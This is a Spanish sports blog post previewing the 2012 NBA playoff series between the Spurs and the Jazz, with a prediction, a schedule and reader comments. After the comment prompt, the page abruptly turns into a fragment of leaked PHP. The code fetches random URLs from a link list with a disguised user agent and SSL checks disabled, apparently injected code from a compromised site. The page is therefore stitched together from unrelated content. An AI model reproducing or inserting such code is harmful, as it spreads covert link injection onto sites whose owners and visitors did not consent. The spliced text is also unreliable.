Análisis: San Antonio Spurs (1) vs Utah Jazz (8)

29 de April de 2012 por TheDeerHunter

Regular: 3 – 1

Spurs: 103.6 PF – 96.4 PC
Jazz: 99.7 PF – 99.1 PC

No hace tanto timepo hablar de una serie Spurs vs Jazz era algo parecido a hacerlo de la guerra del Vietnam o de las trincheras en la Primera Guerra mundial. “El Álamo” vs “el infierno de Salt Lake”. Las defensas de los pretorianos de Popovic y de Sloan. Las caricias de Bowen, de Ostertag, de ” el Cartero”… Nos cuentan hace apenas un lustro que ambos se enfrentarían en una serie de playoffs como 2 de los 4 equipos más anotadores de la liga y nos hubiera venido a la cabeza la palabra “psicotrópico”.

Pues sí, señores, aquí los tenemos. Lo más parecido actualmente al Suns vs Kings de las mejores épocas. Al guateque, al ye-ye, a la tortilla de patatas que decía Andrés… Bienvenidos al espectáculo del Spurs-Jazz.

En general, hablar de una primera ronda entre el mejor clasificado de una conferencia y el oactvo suele ser hacerlo de un paseo militar, de un favorito frente a una “María”, de milagros en forma de “We Believe” o de evitar la barrida por parte del más débil. Esto cada día es menos cierto en el Wild Wild West.

Lo sufrieron los propios Spurs en sus carnes el año pasado. Ni siquiera nos sorprendimos excesivamente de la eliminación contra Grizzlies tras otra fantástica regular. En otros tiempos eso hubiera sido sencillamente imposible. El equipo aún arrastra los estigmas del tropiezo y no se palpa el crédito asociado al nivel de juego y resultados alcanzados. Los Jazz son una dura primera piedra de toque para saber si estos Spurs van en serio o éste es un año par como cualquier otro.

Claves de la eliminatoria

– La defensa: De perogrullo. Ambos son excelentes mirando aro pero el nivel defensivo difiere notablemente. Si los Spurs en ese sentido están en un nivel medio respecto al resto los Jazz se han mostrado excesivamente bisoños. El único partido del curso que han logrado ganar en sus enfrentamientos directos fue el que les dejaron por debajo de los 100 puntos.

– El juego interior: Casi sabe a sacrilegio decirlo pero los Jefferson, Millsap, Favors y Kanter van a suponer tanto reto para Duncan y compañía como lo fue el año pasado el Marc-Zach-Arthur… y ya vimos cómo terminó aquello.

– Veteranía vs juventud: En una temporada normal habría que preocuparse por el estado del eje “old” de los Spurs. Ellos ya saben lo que es ganar una campaña con lockout, han podido permitirse rotaciones, y gente como Ginóbili apenas ha disputado la mitad del curso. Difícilmente podrán igualar en piernas a la joven plantilla de los Jazz (algo que ya pagaron el año pasado), pero no deberían estar tan desgastados. Además la veteranía es un grado. Toma topicazo.

Pronóstico

4-1 Spurs

Calendario (hora española)

Partido 1 – Domingo 29 de abril en San Antonio (19h00)
Partido 2 – Jueves 3 de mayo en San Antonio (01h00)
Partido 3 – Domingo 6 de mayo en Salt Lake City (04h00)
Partido 4 – Lunes 7 de mayo en Salt Lake City
Partido 5 – Miércoles 9 de mayo en San Antonio
Partido 6 – Viernes 11 de mayo en Salt Lake City
Partido 7 – Domingo 13 de mayo en San Antonio

Comenta

9 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Otra clave, si se me permite:

    -Fondo de armario: Los Spurs pueden rotar hasta que se cansen. Creo que Jazz no lo pueden hacer, o al menos no al mismo nivel, salvo en el juego interior

    Sí, puede ser un 4-1… Coincido contigo

      Citar

  2. simon dice:
    #2

    Excelente análisis! El mejor de todos los que se han escrito ( los otros también son buenos ehh =) ).
    Enhorabuena! La única duda que me queda en esta serie es si 4-1 o 4-0 no veo a estos Jazz ni la mitad de los Grizzlies del año pasado, por dentro si, pero por fuera no tienen ni la mitad de lo que tenia/tiene Grizzlies.

      Citar

  3. MagicJohnson32 dice:
    #3

    Creo que los Jazz deberían apostar por machacar a los Spurs en la pintura, y jugar la mayoría de los minutos con Harris-Hayward-Millsap-Favors-Jefferson. Sólo así, a partir de un dominio abrumador del rebote, pueden frenar el ritmo que impone Tony Parker, que es la clave del abrumador nivel ofensivo de estos Spurs.
    Aun así, todo apunta a eliminatoria muy corta.

      Citar

  4. rumbero dice:
    #4

    Creo que el mal recuerdo del año pasado va a hacer que los Spurs no se despisten. Si es cierto que pueden sufrir con Millsap-Jefferson pero son mucho más equipo y querran demostrar que aun conn el paso de los años siguen siendo candidatos al anillo (y encima reinventándose). Parker-Manudo-Duncan sanos y en PO y un gran banquilloen es mucha tea. Les doy una victoria a los Jazz en Salt Lake. 4-1

    “Nos cuentan hace apenas un lustro que ambos se enfrentarían en una serie de playoffs como 2 de los 4 equipos más anotadores de la liga y nos hubiera venido a la cabeza la palabra “psicotrópico”. Genial xD

      Citar

  5. Lucho dice:
    #5

    Comparto, Spurs en 5
    4-1

      Citar

  6. rumbero dice:
    #6

    Parece que los Spurs ponen una marcha más. Parker ya ha tomado el mando del partido y Duncan está con un 11-9. Y Diaw, que con ese sobrepeso no defiende un carajo 9 puntitos!
    A ver si Jazz no se descuelgan. Deberian insistir más aun con Millsap

      Citar

  7. rumbero dice:
    #7

    Partidazo de Parker. Y Duncan ha hecho un tercer cuarto enorme, para mirárselo y olvidarse que tiene 36 primaveras. Y otro veterano como Jackson jugando bien también. Muy dificil asi para Utah, que lo ha intentado pero no ha sido suficiente. Y con Harris a este nive lo van a tener imposible

      Citar

  8. TheDeerHunter dice:
    #8

    No es por nada… pero ojo a lo que ha hecho Popovic con la rotación al final, en similar contexto de lo de ayer. Minutos para Mills, Anderson, Green, Leonard y Blair.

      Citar

  9. Tobal dice:
    #9

    Veo a los Spurs muy superiores,yo creo que esto quedará 4 – 0 para los de San Antonio.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>